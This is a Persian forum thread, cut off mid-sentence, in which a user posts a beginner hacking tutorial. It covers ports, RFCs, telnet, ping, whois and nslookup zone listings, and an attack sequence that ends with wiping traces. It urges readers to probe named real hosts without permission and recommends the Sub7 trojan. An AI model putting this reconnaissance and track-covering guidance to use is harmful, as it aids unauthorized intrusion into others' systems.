PDA

نسخه کامل مشاهده نسخه کامل : هک و هکر در Vb



mazi_z_PSP
09-05-2007, 15:15
سلام دوستان خوب. از این به بعد هرچی مطلب در رابطه با هک ميخواين ميتونين اینجا پيدا کنين

mazi_z_PSP
09-05-2007, 15:19
ترمينولوژی (اصطلاح‌شناسی) - Hacker کيست ؟ هکر کسی است که با سيستم های کامپيوتری آشناست و می‌تواند با روش‌هايی خاص (بدون اجازه) وارد آنها شود... اين انسان می‌تواند خوب يا بد باشد ( در هر حال هکر است) - سوال: يک هکر از چه راهی وارد يک سيستم می‌شود؟ از راه شبکه (نه بابا( ! بايد توجه کنيد که هر سيستم کامپيوتری (به عبارت بهتر هر سيستم عامل) به هر حال محصول کار تعدادی انسان است و حتما دارای تعدادی) bug خطاهايی که بعد از ارائه محصول به بازار به تدريج کشف می‌شوند) خواهد بود. بعد از اينکه يک باگ مشخص شد، شرکت ها نرم‌افزارهايی را به‌سرعت (در عرض چند ساعت ) ايجاد می‌کنند تا مشکل رفع شود اين‌ها را patch می‌گويند. و بعد مديران شبکه (Wbemasters) در عرض چند روز تا چند سال (آين آخری در مورد ايرانه) آنها را download کرده و مشکل را حل می‌کنند. در اين فاصله هکرها دمار از روزگار اين سايت‌ها در می‌اورند... - تعريف چند اصطلاح: *** Hacker واقعی = سامورايی : کسی که هدفش از نفوذ به سيستم‌ها نشان دادن ضعف سيستم‌های کامپيوتری است نه سوءاستفاده ... *** Wacker واکر: کسی که هدفش از نفوذ به سيستم‌ها، استفاده از اطلاعات آن سيستم‌هاست)جرو هکر‌های کلاه‌ سياه ( *** Cracker کراکر: کسی که هدفش از نفوذ به سيستم‌ها، خرابکاری و ايجاد اختلال در سيستم‌های کامپيوتری است. (جرو هکر‌های کلاه‌ سياه( *** Preaker : از قديمي‌ترين هکرها هستند که برای کارشان نياز (و دسترسی) به کامپيوتر نداشتند و کارشان نفوذ به خطوط تلفن برای تماس مجانی، استراق‌سمع و ... بود. اين جزو آموزش من نيست چون کار خيلی بديه تقسيم‌بندی - انواع کامپيوتر‌های شبکه: => کامپيوترهای Server : کامپيوترهايی که کارشان تامين اطلاعات در شبکه است، مثلآ کامپيوترهايی که سايت‌ها را نگه می‌دارند. => کامپبوتر‌های Client : کامپيوترهايی که استفاده کننده هستند مثل همين کامپيوتر خودتان که داريد ازش کار می‌کشيد. - انواع سيستم‌ عامل‌هايی که Server ها از آن استفاده‌ می‌کنند: => سيستم‌های فعلی: * خانواده Unixمثل( FreeBSD , Linux ) * خانواده Windows مثل( WinNT, Win2000 ) * Sun Solaris * OsMac => سيستم‌های قديمی (منقرض شده - آخيش ![ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] AIX, IRIS, DEC10, DEC20 , ... - سوال: کدام‌ها را بايد ياد گرفت؟ Win2000, Unix(Linux) را بايد ياد بگيريد. پيشنهاد من اين است که Win2000و RedHat Linux را روی کامپيوتر خود همزمان داشته باشيد. Command Prompt چيست؟ در بسياری از درس‌های آينده از Command Prompt(خط فرمان) ويندوز استفاده خواهيم کرد. برای باز کردن آن يکی از روش‌های زير را به کار بريد: ۱- مسير زير را در ويندوز طی کنيد: Start > Programs > Accessories > Command Prompt ۲- در قسمت Run بنويسيد command يا cmd معرفی چند اصطلاح IP: شماره‌ ايست که به هر کامپيوتر متصل به اينترنت داده می‌شود تا بتوان به‌کمک آن شماره به آن کامپيوترها دسترسی داشت. اين عدد برای کامپيوترهايی که حالت سرور دارند (مثلا سايت‌ها) و نيز کامپيوتر‌های کلاينتی که معمولا به روشی غير از شماره‌گيری (Dial Up) به اينترنت وصل هستند، عددی ثابت و برای ديگران عددی متغير است. مثلا هر بار که شما با شرکت ISP خود تماس گرفته و به اينترنت وصل می‌شويد، عددی جديد به شما نسبت داده می‌شود. اين عدد يک عدد ۳۲ بيتی (۴ بايتی) است و برای راحتی به‌صورت زير نوشته می‌شود: xxx.xxx.xxx.xxx که منظور از xxx عددی بين ۰ تا ۲۵۵ است (البته بعضی شماره‌ها قابل استفاده نيست که بعدا علت را توضيح خواهم داد). مثلا ممکن است آدرس شما به صورت 195.219.176.69 باشد. حتی اسم‌هايی مثل [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) که برای اتصال استفاده می‌کنيد، در نهايت بايد به يک IP تبديل شود، تا شما سايت ياهو را ببينيد. در IP معمولا xxx اولی معنای خاصی دارد، که بعدا توضيح می‌دهم... فقط اين را بگويم که اگر به روش Dial Up به اينترنت وصل شويد، معمولا عددی که به عنوان xxx اول می‌گيريد، مابين 192 تا 223 خواهد بود.اين توضيح برای تشخيص کامپيوترهای کلاينت از سرور (حداقل در ايران) بسيار می‌تواند مفيد باشد. بعد از اتصال به اينترنت برای به دست آوردن IP خود، از دستور IPCONFIG در command prompt استفاده کنيد. (البته يک سری نکات فنی داريم که بعدا می‌گم) پورت (Port): در ساده ترين تعريف، محلی است که داده‌ها وارد با خارج می‌شوند. در مبحث هک معمولا با پورت‌های نرم‌افزاری سروکار داريم که به هر کدام عددی نسبت می‌دهيم. اين اعداد بين ۱ و ۶۵۵۳۵ هستند. معمولا به يک سری از پورت‌ها کار خاصی را نسبت می‌دهند و بقيه به‌صورت پيش‌فرض برای استفاده شما هستند. پورت‌های که فعال هستند، هرکدام توسط يک نرم‌افزار خاص مديريت می‌شوند. مثلا پورت ۲۵ برای ارسال Email است، بنابراين بايد توسط يک نرم‌افزار اين کار انجام شود و اين نرم‌افزار بر روی پورت ۲۵ منتظر (فال‌گوش) می‌ماند. اينجا ممکن است شخصی از فلان نرم‌افزار و ديگری از بهمان نرم‌افزار استفاده کند ولی به‌هر حال پورت ۲۵ هميشه برای ارسال Email است. در پايين ليستی از مهمترين پورت‌ها و کاربردشان را می‌بينيد: Port Num Service Why its phun -------- ------- ---------------------------------------- 7 echo Host repearts what you type 9 discard Dev/null 11 systat Lots of info on users 13 daytime Time and date at computers location 15 netstat Tremendous info on networks 19 chargen Pours out a stream of ASCII characters. 21 ftp Transfers files 23 telnet Where you log in. 25 smpt Forge email 37 time Time 39 rlp Resource location 43 whois Info on hosts and networks 53 domain Nameserver 70 gopher Out-of-date info hunter 79 finger Lots of info on users 80 http Web server 110 pop Incoming email 119 nntp Usenet news groups -- forge posts, cancels 443 shttp Another web server 512 biff Mail notification 513 rlogin Remote login who Remote who and uptime 514 shell Remote command, no password used syslog Remote system logging 520 route Routing information protocol از ميان اين پورت‌ها شماره‌های ۷، ۱۵، ۲۱، ۲۳، ۲۵، ۷۹، ۸۰، ۱۱۰و ۱۱۹ فعلا برای ما مهم‌ترند و به‌تدريج با آنها آشنا خواهيد شد. چگونه به يک پورت Telnet کنيم؟ برای اينکه عملکرد يک پورت برای شما روشن شود، بايد به آن پورت Telnet کنيد. (البته معمولا تعدادی از پورت‌هايی را که ممکن است اطلاعاتی مهم را در اختيار هکر‌ها قرار دهند مثل پورت ۷۹ معمولا بسته است و ارتباط با آنها شايد برقرار نشود.) برای telnet کردن در command prompt دستور زير را تايپ کنيد: telnet hostname portnum در اين دستور به‌جای hostname شماره ip و يا نام سايت را وارد می‌کنيد و به‌جای portnum شماره پورت و يا معادل آن از جدول. مثلا برای تلنت کردن به پورت ۱۳ که ساعت و تاريخ را به‌دست می‌دهد در کامپيوتری به‌ اسم [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) مي‌نويسيد: telnet iums.ac.ir 13 telnet iums.ac.ir daytime هر دو اين دستورات معادل هم هستند. تلنت کردن معمولا اولين کاری است که يک هکر برای هک کردن يک سايت انجام می‌دهد، زيرا بعضی از پورت‌ها در صورت بسته نبودن روی آن سرور، معمولا حاوی اطلاعات بسيار مهمی هستند. همين الان شروع کنيد و مثل يک هکر واقعی به کامپبوتر‌های مختلف و پورت‌های گوناگون تلنت کنيد. مخصوصا اگر پورت ۷۹ (finger) روی يک کامپيوتر باز بود، مرا هم خبر کنيد تقسيم‌بندی انواع حملات اولين نکته‌ای که لازم است بگويم اينه که وقت خود را برای هک کردن کامپيوتر‌های کلاينت هدر ندهيد (اگرچه برای افراد مبتدی کار با نرم‌افزاری مثل Sub7 زياد هم بد نيست ولی نبايد زياده‌روی کرد) علت هم اينه که هربار که به اينترنت وصل می‌شوند ip جديدی به‌ آنها اختصاص پيدا می‌کنه و زحماتتون هدر می‌ره (البته برای جلوگيری از اين امر هم روشهايی هست که در آينده ايشالله ميگم). حالا تقسيم‌بندی: ۱- حمله به روش Denial of Service Attack) DoS) ۲- حمله به روش Exploit ۳- حمله به روش Info Gathering (تلنت کردن يکی از مثالهای آن است که امروز آموختيد) ۴- حمله به روش Disinformation ترسيم مسير برای آينده: ۱- اولين و مهمترين تصميم انتخاب نوع کامپيوتری است که می‌خواهيد هک کنيد ( کلاينت يا سرور )، زيرا روش‌هک کردن اين‌دو بجز در مراحل ابتدايی کاملا متفاوت است. ۲- دومين گام انتخاب يک کامپيوتر مشخص (مثلا کامپيوتری که فلان سايت را نگه می‌دارد که مثالی برای کامپيوتر سرور است و يا کامپیوتر فلان شخصی که با او چت می‌کنيد که مثالی برای کامپيوتر کلاينت است) و جمع‌آوری اطلاعات در مورد آن است. اين جمع‌آوری اطلاعات از قربانی (Victim) را Footprinting گويند. اولين مشخصه‌ای که بايد کشف شود، ip اوست. يکی ديگر از اطلاعات مهم که معمولا دنبالش هستيم، پيدا کردن نوع سيستم‌عامل و نيز برنامه‌هايی است که کامپيوتر شخص از آنها بهره می‌برد. يکی از مهمترين ( و گاه خطرناک‌ترين) کارها، تست‌کردن پورت‌های آن کامپيوتر برای ديدن اينکه کدام پورت‌ها باز و کدام‌ها بسته هستند. ۳- مرحله بعدی در واقع شروع تلاش برای نفوذ به سيستم است. اين نفوذ سطوح مختلف دارد و بالاترين آن که در کامپيوترهای سرور روی می‌دهد، حالتی است که بتوان username و password مربوط به مدير کامپيوتر (administrator) يا superuser را به‌دست آورده و از طريق اين Shell Account به نهايت نفوذ دست‌ يابيم ولی گاه به‌دلايل مختلف (مربوط به سطح علمی خود و ... ) نمی‌توان به اين سطح دست‌يافت اما به هر حال برای مرحله بعدی می‌تواند استفاده شود. اين مرحله جايی است که هنر شما يه عنوان يک هکر آغاز شده و نيز به پايان می‌رسد. ۴- اين مرحله بعد از نفوذ روی می‌دهد که در آن به يک سطحی از کنترل سيستم رسيده‌ايد. رفتار شما در اين مرحله مشخص می‌کند که چه نوع هکر هستيد(سامورايی، واکر و يا کراکر) و اينکه آيا جنبه ياد گرفتن را داشته‌ايد يا نه، همينجا مشخص خواهد شد. ۵- مرحله آخر پاک کردن ردپاست تا گير نيفتيم (البته بعضی وقتها برای کلاس گذاشتن بايد گير بيفتيم، هه هه ...). بعضی از سيستم‌ها آمار login را نگه می‌دارند که در مورد آنها اين مرحله بسيار مهم است. خلاصه مطالب بالا به اين صورت است: Selection -> FootPrinting -> Penetration -> [Changings] -> Cleaning شروع مبحث Footprinting گفتيم که اولين مرحله جمع‌آوری اطلاعات است که به آن FootPrinting می‌گويند. اين مبحث را با آموزش روش پيدا کردن ip شروع می‌کنيم. پيدا کردن ip يک سايت با دانستن آدرس اينترنتی برای اين کار روشهای مختلفی هست: ۱- در (Internet Explorer (IE آدرس را تايپ کنيد و Enter را فشار دهيد. در قسمت پايين مرورگر يعنی Status Bar پس از چند لحظه برای مدت کوتاهی ip نمايش داده می‌شود و می‌توانيد آنرا يادداشت کنيد. اگر طول اين مدت بسيار کوتاه است می‌توانيد از صفحه عکس بگيريد ( با دکمه Print Screen ) و در يک نرم‌افزار گرافيکی بعد از باز کردن يک صفحه خالی به کمک Ctrl+V آنرا مشاهده کنيد. [ عجب راه احمقانه‌ای ;-) اگر اين کار را برای [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) انجام دهيم: که همان شماره ip برای [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) است. نکته بسيار مهم اين است که به‌دليل ضريب اشتباه بسيار بالای آن هيچ‌گاه از اين روش استفاده نکنيد. نتايج ممکن است کاملا اشتباه باشد که بعدا ميگم چرا. ۲- دستور ping را در command prompt صادر کنيد: ping domain در اين حالت می‌توانم ip آن سايت را ملاحظه کنم. (البته کار اصلی ping يک چيز ديگست و ميشه گفت داريم ازش سوءاستفاده می‌کنيم). مثلا برای پيدا کردن ip سازين می‌نويسم: ping sazin.com و جواب می‌شنوم: Pinging sazin.com [63.148.227.65] with 32 bytes of data: Reply from 63.148.227.65: bytes=32 time=821ms TTL=111 Reply from 63.148.227.65: bytes=32 time=821ms TTL=111 Reply from 63.148.227.65: bytes=32 time=822ms TTL=111 Reply from 63.148.227.65: bytes=32 time=811ms TTL=111 Ping statistics for 63.148.227.65: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 811ms, Maximum = 822ms, Average = 818ms ملاحظه می‌فرماييد که ip سازين 63.148.227.65 است. اگر دستور ping را به‌جای sazin.com برای [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) صادر کنيد، جواب همان است. البته برای سايت‌های بزرگ جواب‌های حاصل متفاوت خواهد بود. ۳- روش بعدی و کامل‌ترين روش whois کردن به بعضی سايت‌های خاص است. بعدا اين را کامل‌تر توضيح می‌دم ولی فعلا روشش رو می‌گم. آدرس زير را در مرورگر خود تايپ کنيد: [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] که به‌جای xxxxxx آدرس مورد نظر را تايپ کنيد. مثلا برای sazin.com يکی از دو آدرس زير را بايد تايپ کرد: [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] چيزی که در صفحه ظاهر می‌شود به صورت زير است: whois -h magic 63.148.227.65 sazin.com resolves to 63.148.227.65 Trying whois -h whois.arin.net 63.148.227.65 Qwest Communications NET-QWEST-BLKS-2 (NET-63-144-0-0-1) 63.144.0.0 - 63.151.255.255 Neutron Digital Media Corp. QWST-63-148-224 (NET-63-148-224-0-1) 63.148.224.0 - 63.148.231.255 # ARIN Whois database, last updated 2002-09-04 19:05 # Enter ? for additional hints on searching ARIN"s Whois database. که آدرس ip در سطر اول و دوم ذکر شده است. اگر دو روش آخر را برای سايت بزرگ yahoo انجام دهيم، نتايج زير را می‌بينيم: --> روش ping : [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) ====> 64.58.76.229 yahoo.com ====> 66.218.71.198 --> روش whois : ...و [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) ====> 66.218.71.86 64.58.79.230 و yahoo.com ====> 66.218.71.198 نتايج حاصل گويای آن است که چرا بهتر است از whois استفاده کنيم. RFC چيست ؟ متون بسيار کامل ولی خشک و ثقيل که در مورد مفاهيم مختلف شبکه بحث می‌کنند. اين فايل‌ها به صورت متنی و با پسوند txt هستند و به‌عنوان مرجع (برای مراجعه و نه مطالعه کامل) کاربرد دارند. اين فايل‌ها يک‌بار منتشر شده و هرگز تغيير داده نمی‌شوند (حتی اگر حاوی اشتباه باشند.) فايل‌های RFC از کجا قابل دسترسی هستند؟ RFCها از سايت‌های بسياري قابل دسترس هستند ولی سايت مورد علاقه من برای RFCها، سايت زير است: [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] که به‌جای xxxxxxx نام rfc موردنظر را می‌نویسيم. مثلا برای دسترسی به rfc791 بايد آدرس را به‌ صورت زير تايپ کنيم: [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
__________________

mazi_z_PSP
12-05-2007, 13:31
ليست مشهورترين RFCها: +General Information RFC1360 IAB Official Protocol Standards RFC1340 Assigned Numbers RFC1208 Glossary of Networking Terms RFC1180 TCP/IP Tutorial RFC1178 Choosing a Name for Your Computer RFC1175 FYI on Where to Start: A Bibliography of Inter-networking Information RFC1173 Responsibilities of Host and Network Managers: A Summary of the Oral Tradition of the Internet RFC1166 Internet Numbers RFC1127 Perspective on the Host Requirements RFCs RFC1123 Requirements for Internet Hosts—Application and Support RFC1122 Requirements for Internet Hosts—Communication Layers RFC1118 Hitchhikers Guide to the Internet RFC1011 Official Internet Protocol RFC1009 Requirements for Internet Gateways RFC980 Protocol Document Order Information +TCP and UDP RFC1072 TCP Extensions for Long-Delay Paths RFC896 Congestion Control in IP/TCP Internetworks RFC879 TCP Maximum Segment Size and Related Topics RFC813 Window and Acknowledgment Strategy in TCP RFC793 Transmission Control Protocol RFC768 User Datagram Protocol +IP and ICMP RFC1219 On the Assignment of Subnet Numbers RFC1112 Host Extensions for IP Multicasting RFC1088 Standard for the Transmission of IP Datagrams over NetBIOS Networks RFC950 Internet Standard Subnetting Procedure RFC932 Subnetwork Addressing Schema RFC922 Broadcasting Internet Datagrams in the Presence of Subnets RFC9l9 Broadcasting Internet Datagrams RFC886 Proposed Standard for Message Header Munging RFC815 IP Datagram Reassembly Algorithms RFC814 Names, Addresses, Ports, and Routes RFC792 Internet Control Message Protocol RFC791 Internet Protocol RFC781 Specification of the Internet Protocol (IP) Timestamp Option +Lower Layers RFC1236 IP to X.121 Address Mapping for DDN RFC1220 Point-to-Point Protocol Extensions for Bridging RFC1209 Transmission of IP Datagrams over the SMDS Service RFC1201 Transmitting IP Traffic over ARCNET Networks RFC1188 Proposed Standard for the Transmission of IP Datagrams over FDDI Networks RFC1172 Point-to-Point Protocol Initial Configuration Options RFC1171 Point-to-Point Protocol for the Transmission of Multiprotocol Datagrams over Point-to-Point Links RFC1149 Standard for the Transmission of IP Datagrams on Avian Carriers RFC1055 Nonstandard for Transmission of IP Datagrams over Serial Lines: SLIP RFC1044 Internet Protocol on Network Systems HYPERchannel: Protocol Specification RFC1042 Standard for the Transmission of IP Datagrams over IEEE 802 Networks RFC1027 Using ARP to Implement Transparent Subnet Gateways RFC903 Reverse Address Resolution Protocol RFC895 Standard for the Transmission of IP Datagrams over Experimental Ethernet Networks RFC894 Standard for the Transmission of IP Datagrams over Ethernet Networks RFC893 Trailer Encapsulations RFC877 Standard for the Transmission of IP Datagrams over Public Data Networks +Bootstrapping RFC1084 BOOTP Vendor Information Extensions RFC951 Bootstrap Protocol RFC906 Bootstrap Loading Using TFTP +Domain Name System RFC1101 DNS Encoding of Network Names and Other Types RFC1035 Domain Names—Implementation and Specification RFC1034 Domain Names—Concepts and Facilities RFC1033 Domain Administrators Operations Guide RFC1032 Domain Administrators Guide RFC974 Mail Routing and the Domain System RFC920 Domain Requirements RFC799 Internet Name Domains +File Transfer and File Access RFC1094 NFS: Network File System Protocol Specification RFC1068 Background File Transfer Program (BFTP) RFC959 File Transfer Protocol RFC949 FTP Unique-Named Store Command RFC783 TFTP Protocol (Revision 2) RFC775 Directory Oriented FTP Commands +Mail RFC1341 MIME (Multipurpose Internet Mail Extensions) Mechanisms for Specifying and Describing the Format of Internet Message Bodies RFC1143 Q Method of Implementing Telnet Option Negotiation RFC1090 SMTP on X.25 RFC1056 PCMAIL: A Distributed Mail System for Personal Computers RFC974 Mail Routing and the Domain System RFC822 Standard for the Format of ARPA Internet Text Messages RFC821 Simple Mail Transfer Protocol +Routing Protocols RFC1267 A Border Gateway Protocol 3 (BGP-3) RFC1247 OSPF version 2 RFC1222 Advancing the NSFNET Routing Architecture RFC1195 Use of OSI IS-IS for Routing in TCP/IP and Dual Environments RFC1164 Application of the Border Gateway Protocol in the Internet RFC1163 Border Gateway Protocol (BGP) RFC1136 Administrative Domains and Routing Domains: A Model for Routing in the Internet RFC1074 NSFNET Backbone SPF-Based Interior Gateway Protocol RFC1058 Routing Information Protocol RFC911 EGP ateway under Berkeley UNIX 4.2 RFC904 Exterior Gateway Protocol Formal Specification RFC888 STUB Exterior Gateway Protocol RFC827 Exterior Gateway Protocol (EGP) RFC823 DARPA Internet Gateway +Routing Performance and Policy RFC1254 Gateway Congestion Control Survey RFC1246 Experience with the OSPF Protocol RFC1245 OSPF Protocol Analysis RFC1125 Policy Requirements for Inter-Administrative Domain Routing RFC1124 Policy Issues in Interconnecting Networks RFC1104 Models of Policy-Based Routing RFC1102 Policy Routing in Internet Protocols +Terminal Access RFC1205 Telnet 5250 Interface RFC1198 FYI on the X Window System RFC1184 Telnet Linemode Option RFC1091 Telnet Terminal-Type Option RFC1080 Telnet Remote Flow Control Option RFC1079 Telnet Terminal Speed Option RFC1073 Telnet Window Size Option RFC1053 Telnet X.3 PAD Option RFC1043 Telnet Data Entry Terminal Option: DODIIS Implementation RFC1041 Telnet 3270 Regime Option RFC1013 X Window System Protocol, version 11: Alpha Update RFC946 Telnet Terminal Location Number Option RFC933 Output Marking Telnet Option RFC885 Telnet End of Record Option RFC861 Telnet Extended Options: List Option RFC860 Telnet Timing Mark Option RFC859 Telnet Status Option RFC858 Telnet Suppress Go Ahead Option RFC857 Telnet Echo Option RFC856 Telnet Binary Transmission RFC855 Telnet Option Specifications RFC854 Telnet Protocol Specification RFC779 Telnet Send-Location Option RFC749 Telnet SUPDUP-Output Option RFC736 Telnet SUPDUP Option RFC732 Telnet Data Entry Terminal Option RFC727 Telnet Logout Option RFC726 Remote Controlled Transmission and Echoing Telnet Option RFC698 Telnet Extended ASCII Option +Other Applications RFC1196 Finger User Information Protocol RFC1179 Line Printer Daemon Protocol RFC1129 Internet Time Synchronization: The Network Time Protocol RFC1119 Network Time Protocol (version 2) Specification and Implementation RFC1057 RPC: Remote Procedure Call Protocol Specification: Version 2 RFC1014 XDR: External Data Representation Standard RFC954 NICNAME/WHOIS RFC868 Time Protocol RFC867 Daytime Protocol RFC866 Active Users RFC865 Quote of the Day Protocol, RFC864 Character Generator Protocol RFC863 Discard Protocol RFC862 Echo Protocol Network Management RFC1271 Remote Network Monitoring Management Information Base RFC1253 OSPE version 2: Management Information Base RFC1243 Appletalk Management Information Base RFC1239 Reassignment of Experimental MIBs to Standard MIBs RFC1238 CLNS MIB for Use with Connectionless Network Protocol (ISO 8473) and End System to Intermediate System (ISO 9542) RFC1233 Definitions of Managed Objects for the DS3 Interface Type RFC1232 Definitions of Managed Objects for the DS1 Interface Type RFC1231 IEEE 802.5 Token Ring MIB RFC1230 IEEE 802.4 Token Bus MIB RFC1229 Extensions to the Generic-Interface MIB RFC1228 SNMP-DPI: Simple Network Management Protocol Distributed Program Interface RFC1227 SNMP MUX protocol and MIB RFC1224 Techniques for Managing Asynchronously Generated Alerts RFC1215 Convention for Defining Traps for Use with the SNMP RFC1214 OSI Internet Management: Management Information Base RFC1213 Management Information Base for Network Management of TCP/IP-based Internets: MiB-II RFC1212 Concise MIB Definitions RFC1187 Bulk Table Retrieval with the SNMP RFC1157 Simple Network Management Protocol (SNMP) RFC1156 Management Information Base for Network Management of TCP/IP-based Internets RFC1155 Structure and Identification of Management Information for TCP/IP-Based Internets RFC1147 FYI on a Network Management Tool Catalog: Tools for Monitoring and Debugging TCP/IP Internets and Interconnected Devices RFC1089 SNMP over Ethernet +Tunneling RFC1241 Scheme for an Internet Encapsulation Protocol: Version 1 RFC1234 Tunneling IPX Traffic through IP Networks RFC1088 Standard for the Transmission of IP Datagrams over NetBIOS Networks RFC1002 Protocol Standard for a NetBIOS Service on a TCP/UDP Transport: Detailed Specifications RFC1001 Protocol Standard for a NetBIOS Service on a TCP/UDP Transport: Concepts and Methods +OSI RFC1240 OSI Connectionless Transport Services on Top of UDP: Version 1 RFC1237 Guidelines for OSI NSAP Allocation in the Internet RFC1169 Explaining the Role of GOSIP +Security RFC1244 Site Security Handbook RFC1115 Privacy Enhancement for Internet Electronic Mail: Part III Algorithms, Modes, and Identifiers [Draft] RFC1114 Privacy Enhancement for Internet Electronic Mail: Part II Certificate-Based Key Management [Draft] RFC1113 Privacy Enhancement for Internet Electronic Mail: Part I— Message Encipherment and Authentication Procedures [Draft] RFC1108 Security Options for the Internet Protocol +Miscellaneous RFC1251 Whos Who in the Internet: Biographies of IAB, IESG, and IRSG Members RFC1207 FYI on Questions and Answers: Answers to Commonly Asked Experienced Internet User RFC1206 FYI on Questions and Answers: Answers to Commonly Asked New Internet User Questions

mazi_z_PSP
12-05-2007, 13:32
چگونگی استفاده از nslookup وقتی که DNS Server يک سايت را به‌دست آورده باشيم (از طريق whois )، به کمک دستور nslookup مي‌توان اطلاعاتی اضافی در مورد آن سايت پيدا کرد. طريقه استفاده اين دستور به صورت زير است: فرض کنيد که من می‌خواهم از Domain Server سايت خودم (far30.com) اطلاعاتی به‌دست بيارم. اگر به اين سايت whois کنم، می‌بينم که دوتا Name Server يا DNS Server دارد: s1.prdev.com s2.prdev.com حالا ديگر آدرس DNS Server مربوط به far30.com را دارم و می‌توانم شروع کنم: ۱- دستور nslookup را در command prompt نوشته و اجرا می‌کنم: C:\>nslookup و نتايج را می‌بينم: *** Cant find server name for address 192.168.20.3: Non-exi... *** Cant find server name for address 192.168.20.1: Non-exi... *** Default servers are not available Default Server: UnKnown Address: 192.168.20.3 > علامت > يعنی شما می‌توانيد دستورات را تايپ کنيد. ۲- در جلوی علامت < دستور زير را تايپ می‌کنيم: > server dns_server که به جای dns_server بايد آدرس DNS Server سايت موردنظر را بنويسم. پس برای سايت far30.com می‌شود: > server s1.prdev.com و جواب می‌شنوم: Default Server: s1.prdev.com Address: 63.148.227.63 اگر در اين مرحله پيغام خطا می‌گيريد، بايد دوباره اين دستور را تايپ کنيد و نيز می‌توانيد از DNS Server دومی که در whois برای far30.com به‌دست آورديم ، استفاده کنيم. ۳- دستور زير را تايپ کنيد: > set type=any ۴- حالا به کمک دستور زير اطلاعات را به‌دست می‌آوريم: > ls -d site_name . که برای far30.com می‌شود: >ls -d far30.com. دقت کنيد که بعد از اسم سايت يک نقطه (dot) گذاشته‌ام، شما هم بهتر است اينطوری بنويسيد. نتايج زير حاصل می‌شود: [s1.prdev.com] far30.com. SOA s1.prdev.com admin.prdev.com. (2002070412 3600 600 86400 3600) far30.com. A 63.148.227.65 far30.com. NS s1.prdev.com far30.com. NS s2.prdev.com far30.com. MX 10 mail.far30.com far30.com. MX 15 far30.com ftp CNAME far30.com mail A 63.148.227.65 www CNAME far30.com far30.com. SOA s1.prdev.com admin.prdev.com. (2002070412 3600 600 86400 3600) > بعدا در مورد کاربرد تک‌تک اينها صحبت خواهم کرد ولی بعضی از آنها همين‌طوری هم اطلاعات واضحی دارند. ۵- دستور exit را مقابل < تايپ کرده و از nslookup خارج می‌شويم. شما برای تمرين همين کار را در مورد سايت neda.net.ir انجام دهيد. تقسيم‌بندی پورت‌ها از روی شماره آنها ۱- پورت‌های 0 تا 1023 : مشهورترين پورت‌ها هستند و معمولا هرکدام برای يک سرويس خاص استفاده می‌شود. با تعدادی از اين پورت‌ها در جلسات قبل آشنا شده‌ايد. ۲- پورت‌های 1024 تا 49151 : اين سری از پورت‌ها مشخصا با هيچ‌يک از سرويس‌های اينترنتی مرتبط نيستند بلکه وقتی که با يک ابزار شبکه مانند مرورگر اينترنت(مثل Internet Explore يا Netscape Navigator )، نرم‌افزار ارسال و دريافت E-mail (مثل Outlook يا Edura )، نرم‌افزارهای FTP (مثل WS-FTP يا Cute-FTP ) کار می‌کنيد، يکی از اين پورت‌ها به صورت random باز شده و يک ارتباط با سرور (با توجه به‌نوع سرويس اينترنتی که می‌دهد که يکی از پورت‌های 0 تا 1023 است) برقرار شده و داده‌ها ارسال و دريافت می‌شوند. يعنی پورت شما يکی از پورت‌های اين قسمت است و پورت سرور يکی از پورت‌های بالايی.اين سری پورت‌ها را پورت‌های register شده هم می‌گويند. ۳- پورت‌های 49152 تا 65535 : اين سری از پورت‌ها به‌ندرت استفاده می‌شوند. کاربرد اساسی آنها برای يک سری سرويس‌های خاص اينترنتی است و يا توسط trojanها (که برای ---- کردن کامپيوتر است) است. البته خيلی از trojanهای معروف از پورت‌های رديف ۲ هم استفاده می‌کنند و اين تقسيم‌بندی‌ها هميشه برقرار نيست و به‌همين علت است که گاهی پورت‌ها را به دو‌دسته زير 1024 و بالای 1024 تقسيم‌ می‌کنند. TCP و UDP چيست؟ مدل TCP/IP که برای ارتباط اينترنتی به‌کار می‌رود، می‌توان به لايه‌های مختلفی تقسيم‌بندی کرد که بعدا بيشتر توضيح می‌دم، اما يکی از اين لايه‌ها، لايه ارتباط host2host است که خود شامل دو پروتکل است به نامهای TCP و UDP : ۱- (TCP (Transmission Control Protocol : اين پروتکل قوی‌تر و قابل اعتمادتر است و اصولا پروتکل مهمتری نسبت به UDP محسوب می‌شود. اين پروتکل توانايی بازبينی بسته‌هاو کنترل خطا را هم دارد. ۲- (UDP (User Datagram Protocol : اين پروتکل برای کاهش overflow طراحی شده است و در خيلی از موارد وابسته به TCP است. نکته مهم اين است که وقتی با يک پورت خاص روی يک کامپيوتر ديگر ارتباط برقرار می‌کنيم، اين ارتباط می‌تواند از نوع TCP يا UDP باشد. بنابراين وقتی می‌خواهيم يک کامپيوتر خاصی را از نظر پورت‌ها بررسی کنيم، هردو 